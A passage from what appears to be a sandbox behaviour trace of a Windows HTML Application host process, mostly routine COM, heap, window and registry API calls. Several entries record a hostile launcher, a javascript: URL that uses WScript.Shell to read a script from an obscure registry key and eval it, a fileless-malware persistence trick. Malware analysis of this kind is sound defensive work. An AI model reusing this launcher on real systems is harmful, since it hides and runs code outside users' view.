[5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x18ef40 | out: ppvObject=0x18ef40*=0x0) returned 0x80004002 [0066.977] IUnknown:AddRef (This=0x652208) returned 0x8 [0066.977] CoInternetParseUrl (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=0x13, dwFlags=0x0, pszResult=0x18cf00, cchResult=0x1000, pcchResult=0x18cee8, dwReserved=0x0 | out: pszResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18cee8) returned 0x0 [0066.978] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, 
[4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cd7c | out: ppv=0x18cd7c*=0x75028d20) returned 0x0 [0066.978] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ce68 | out: ppvObject=0x18ce68*=0x75028d2c) returned 0x0 [0066.978] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.978] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=19, dwParseFlags=0x0, pwzResult=0x18cf00, cchResult=0x1000, pcchResult=0x18cee8, dwReserved=0x0 | out: pwzResult="쿬\x18", pcchResult=0x18cee8*=0x18cfec) returned 0x800c0011 [0066.978] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.978] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63d838 [0066.979] IUnknown:Release (This=0x64e618) returned 0x2 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x17 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x15 [0066.979] CoTaskMemFree (pv=0x0) [0066.979] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a8) returned 0x652b58 [0066.979] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f380 | out: lpCPInfo=0x18f380) returned 1 [0066.979] IUnknown:AddRef (This=0x63ee70) returned 0x3 [0066.979] IUnknown:AddRef (This=0x63c68c) returned 0x16 [0066.979] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f388 | out: ppvObject=0x18f388*=0x63c68c) returned 0x0 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.979] 
IUnknown:AddRef (This=0x63c68c) returned 0x17 [0066.979] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f38c | out: pdwScheme=0x18f38c*=0xf) returned 0x0 [0066.980] IUnknown:Release (This=0x63ee70) returned 0x2 [0066.980] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x652d08 [0066.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0066.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x652d08, dwCreationFlags=0x0, lpThreadId=0x652d1c | out: lpThreadId=0x652d1c*=0x92c) returned 0x12c [0066.981] GetCurrentThreadId () returned 0x2a8 [0066.981] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.981] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.981] IUnknown:Release (This=0x620638) returned 0x3 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x15 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x14 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x13 [0066.982] IUnknown:Release (This=0x620638) returned 0x2 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x12 [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] CoTaskMemFree (pv=0x63cd40) [0066.982] CoTaskMemFree (pv=0x0) [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.982] CoTaskMemFree (pv=0x63cc68) [0066.982] GetClientRect (in: hWnd=0x40162, lpRect=0x18f8a4 | out: lpRect=0x18f8a4) returned 1 [0066.982] 
RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x78) returned 0x621980 [0066.983] GetClientRect (in: hWnd=0x40162, lpRect=0x6219ac | out: lpRect=0x6219ac) returned 1 [0066.983] OffsetRect (in: lprc=0x6219ac, dx=0, dy=0 | out: lprc=0x6219ac) returned 1 [0066.983] OffsetRect (in: lprc=0x6219bc, dx=0, dy=0 | out: lprc=0x6219bc) returned 1 [0066.983] RegisterClassExW (param_1=0x18f3c0) returned 0xc168 [0066.983] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x644ee8) returned 0x0 [0067.730] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x644ee8, aaClassList=0x18f4b8*=0xc168, uSize=0x1) returned 0x0 [0067.730] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x40162, hMenu=0x0, hInstance=0x74af0000, lpParam=0x6421f8) returned 0x202aa [0067.730] GetWindowLongW (hWnd=0x202aa, nIndex=-20) returned 0 [0067.730] SetWindowLongW (hWnd=0x202aa, nIndex=-21, dwNewLong=6562296) returned 0 [0067.730] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x81, wParam=0x0, lParam=0x18f08c*=6562296, plResult=0x18ef04 | out: plResult=0x18ef04) returned 0x1 [0067.730] NtdllDefWindowProc_W () returned 0x1 [0067.730] GetCurrentThreadId () returned 0x2a8 [0067.730] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.730] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x1, wParam=0x0, lParam=0x18f08c*=6562296, 
plResult=0x18ef04 | out: plResult=0x18ef04) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x18ef50 | out: plResult=0x18ef50) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x18ef50 | out: plResult=0x18ef50) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetClassNameW (in: hWnd=0x40162, lpClassName=0x18f4c0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.731] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.732] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x644ee8, fRestoreLayout=1) returned 0x0 [0067.732] SendMessageW (hWnd=0x202aa, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x18f374 | out: plResult=0x18f374) returned 0x1 [0067.732] NtdllDefWindowProc_W () returned 0x3 [0067.732] GetCurrentThreadId () returned 0x2a8 [0067.732] IntersectRect (in: lprcDst=0x18f6f4, lprcSrc1=0x6219ac, lprcSrc2=0x6219bc | out: lprcDst=0x18f6f4) returned 1 [0067.732] EqualRect (lprc1=0x18f6f4, lprc2=0x6219ac) returned 1 [0067.732] InvalidateRect (hWnd=0x202aa, lpRect=0x0, bErase=1) returned 1 [0067.732] 
RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf0) returned 0x652e68 [0067.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x150) returned 0x656798 [0067.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x140) returned 0x6568f0 [0067.732] IntersectRect (in: lprcDst=0x18f5e0, lprcSrc1=0x18f5e0, lprcSrc2=0x18f578 | out: lprcDst=0x18f5e0) returned 1 [0067.732] IntersectRect (in: lprcDst=0x18f5e0, lprcSrc1=0x18f5e0, lprcSrc2=0x18f578 | out: lprcDst=0x18f5e0) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x652f60 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x62d980 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x656a38 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d9b8 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x64f928 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] IntersectRect (in: lprcDst=0x18f41c, lprcSrc1=0x18f41c, lprcSrc2=0x18f3ec | out: lprcDst=0x18f41c) returned 1 [0067.733] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f40c | out: lprcDst=0x656950) returned 1 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6507c0 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6507c0 | out: hHeap=0x610000) returned 1 [0067.733] SetWindowPos (hWnd=0x202aa, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.734] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 
[0067.734] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x46, wParam=0x0, lParam=0x18f6d4*=131754, plResult=0x18f570 | out: plResult=0x18f570) returned 0x1 [0067.734] NtdllDefWindowProc_W () returned 0x0 [0067.734] GetCurrentThreadId () returned 0x2a8 [0067.734] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.734] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x47, wParam=0x0, lParam=0x18f6d4*=131754, plResult=0x18f56c | out: plResult=0x18f56c) returned 0x1 [0067.734] NtdllDefWindowProc_W () returned 0x0 [0067.734] GetCurrentThreadId () returned 0x2a8 [0067.734] SetTimer (hWnd=0x202aa, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.734] GetFocus () returned 0x0 [0067.734] EnumChildWindows (hWndParent=0x202aa, lpEnumFunc=0x74e10a73, lParam=0x18f5cc) returned 0 [0067.734] GetFocus () returned 0x0 [0067.734] SetFocus (hWnd=0x202aa) returned 0x0 [0067.735] NtdllDefWindowProc_W () returned 0x0 [0067.735] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.736] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.737] NtdllDefWindowProc_W () returned 0x1 [0067.737] NtdllDefWindowProc_W () returned 0x0 [0067.738] NtdllDefWindowProc_W () returned 0x0 [0067.969] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.969] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.471] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.471] LresultFromObject () returned 0xc171 [0069.661] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6538d0 
[0069.662] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x650910 [0069.714] GetCurrentThreadId () returned 0x2a8 [0069.721] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6538d0 | out: hHeap=0x610000) returned 1 [0069.722] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.723] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6538d0 [0069.723] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65e078 [0069.723] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.723] IUnknown:QueryInterface (in: This=0x643e24, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18ee80 | out: ppvObject=0x18ee80*=0x65cf98) returned 0x0 [0069.724] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.724] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18ee98 | out: ppCP=0x18ee98*=0x65cfc0) returned 0x0 [0069.724] IConnectionPoint:Advise (in: This=0x65cfc0, pUnkSink=0x66cab8, pdwCookie=0x66cad0 | out: pdwCookie=0x66cad0*=0x66cab8) returned 0x0 [0069.724] IUnknown:QueryInterface (in: This=0x66cab8, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x18ee3c | out: ppvObject=0x18ee3c*=0x66cab8) returned 0x0 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x66bc80 [0069.725] IUnknown:AddRef (This=0x66cab8) returned 0x3 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65e150 [0069.725] IUnknown:Release (This=0x66cab8) returned 0x2 [0069.725] IUnknown:Release 
(This=0x65cfc0) returned 0x0 [0069.725] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.725] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6509a0 [0069.725] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x659f60 [0069.726] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.728] GetMessageTime () returned 0 [0069.728] GetMessagePos () returned 0x0 [0069.728] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x18ef94 | out: plResult=0x18ef94) returned 0x0 [0069.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.732] GetMessageTime () returned 0 [0069.732] GetMessagePos () returned 0x0 [0069.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x18e9c4 | out: plResult=0x18e9c4) returned 0x0 [0069.732] GetCurrentThreadId () returned 0x2a8 [0069.732] GetCurrentThreadId () returned 0x2a8 [0069.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.733] GetMessageTime () returned 0 [0069.733] GetMessagePos () returned 0x0 [0069.733] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f148 | out: lpPoint=0x18f148) returned 1 [0069.733] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f148 | out: lpPoint=0x18f148) returned 1 [0069.734] GetCapture () returned 0x0 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658908 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6509d0 [0069.734] IUnknown:AddRef (This=0x66cab8) returned 0x5 [0069.734] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x65b488 [0069.734] HTMLWindowEvents2:onresize (This=0x66cab8, pEvtObj=0x418) [0069.734] IUnknown:Release (This=0x66cab8) returned 0x4 [0069.734] 
HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65b488 | out: hHeap=0x610000) returned 1 [0069.734] GetCurrentThreadId () returned 0x2a8 [0069.734] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658908 | out: hHeap=0x610000) returned 1 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.735] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x18f384 | out: plResult=0x18f384) returned 0x1 [0069.735] NtdllDefWindowProc_W () returned 0x0 [0069.735] GetCurrentThreadId () returned 0x2a8 [0069.736] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x644ee8, hWnd=0x202aa, phIMC=0x18f6ac | out: phIMC=0x18f6ac*=0x80243) returned 0x0 [0069.736] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x644ee8, hWnd=0x202aa, hIME=0x0, phPrev=0x18f6ac | out: phPrev=0x18f6ac*=0x80243) returned 0x0 [0069.736] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.736] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18f51c | out: ppCP=0x18f51c*=0x65cfb8) returned 0x0 [0069.736] IConnectionPoint:Unadvise (This=0x65cfb8, dwCookie=0x66cab8) returned 0x0 [0069.736] IUnknown:AddRef (This=0x66cab8) returned 0x5 [0069.736] IUnknown:Release (This=0x66cab8) returned 0x4 [0069.736] IUnknown:Release (This=0x66cab8) returned 0x3 [0069.736] IUnknown:Release (This=0x65cfb8) returned 0x0 [0069.736] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.736] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.736] IUnknown:QueryInterface (in: This=0x643e24, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), 
ppvObject=0x18f514 | out: ppvObject=0x18f514*=0x65cf98) returned 0x0 [0069.736] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x60) returned 0x65cf98 [0069.737] IConnectionPointContainer:FindConnectionPoint (in: This=0x65cf98, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x18f518 | out: ppCP=0x18f518*=0x65cfc0) returned 0x0 [0069.737] IConnectionPoint:Unadvise (This=0x65cfc0, dwCookie=0x66cab8) returned 0x0 [0069.737] IUnknown:AddRef (This=0x66cab8) returned 0x4 [0069.737] IUnknown:Release (This=0x66cab8) returned 0x3 [0069.737] IUnknown:Release (This=0x66cab8) returned 0x2 [0069.737] IUnknown:Release (This=0x65cfc0) returned 0x0 [0069.737] IUnknown:Release (This=0x65cf98) returned 0x0 [0069.737] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cf98 | out: hHeap=0x610000) returned 1 [0069.738] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509d0 | out: hHeap=0x610000) returned 1 [0069.738] IUnknown:Release (This=0x643e24) returned 0x3 [0069.738] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509a0 | out: hHeap=0x610000) returned 1 [0069.738] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.738] GetMessageTime () returned 0 [0069.738] GetMessagePos () returned 0x0 [0069.738] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x18f394 | out: plResult=0x18f394) returned 0x0 [0069.739] GetCurrentThreadId () returned 0x2a8 [0069.739] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0069.739] GetMessageTime () returned 0 [0069.739] GetMessagePos () returned 0x0 [0069.739] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x18f394 | out: plResult=0x18f394) returned 0x0 [0069.739] GetCurrentThreadId () returned 0x2a8 [0069.739] IsOS (dwOS=0x25) 
returned 1 [0069.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f5a0 | out: phkResult=0x18f5a0*=0x1e8) returned 0x0 [0069.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f5a4 | out: phkResult=0x18f5a4*=0x1ec) returned 0x0 [0069.740] RegOpenKeyExW (in: hKey=0x1ec, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x18f560 | out: phkResult=0x18f560*=0x0) returned 0x2 [0069.740] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x18f560 | out: phkResult=0x18f560*=0x1f0) returned 0x0 [0069.740] SHRegGetValueW () returned 0x0 [0069.740] RegCloseKey (hKey=0x1f0) returned 0x0 [0069.740] RegCloseKey (hKey=0x0) returned 0x6 [0069.740] RegCloseKey (hKey=0x0) returned 0x6 [0069.740] RegCloseKey (hKey=0x1e8) returned 0x0 [0069.741] RegCloseKey (hKey=0x1ec) returned 0x0 [0069.741] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.860] GetVersionExW (in: lpVersionInformation=0x18f0ac*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f0ac*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.860] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.861] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f628, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.870] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f688, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.870] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 
0x6509a0 [0071.870] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x18f674, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.871] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x62d7f8, Size=0x48) returned 0x659fb0 [0071.871] ShowWindow (hWnd=0x202aa, nCmdShow=1) returned 1 [0071.871] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f140 | out: hHeap=0x610000) returned 1 [0071.871] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0071.871] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0071.871] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0071.872] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f140 [0071.872] RegisterDragDrop (hwnd=0x202aa, pDropTarget=0x750296cc) returned 0x0 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetCurrentThreadId () returned 0x2a8 [0071.873] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0071.873] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0071.873] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0071.874] IInternetProtocolRoot:Continue (This=0x652acc, pProtocolData=0x62d8d8) returned 0x80004004 [0071.874] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x668e08 [0071.874] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f6e0 | out: ppu=0x18f6e0) returned 0x0 [0071.874] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18f5d4 | out: ppvObject=0x18f5d4*=0x0) returned 0x80004002 [0071.874] IServiceProvider:QueryService (in: This=0x6505a4, 
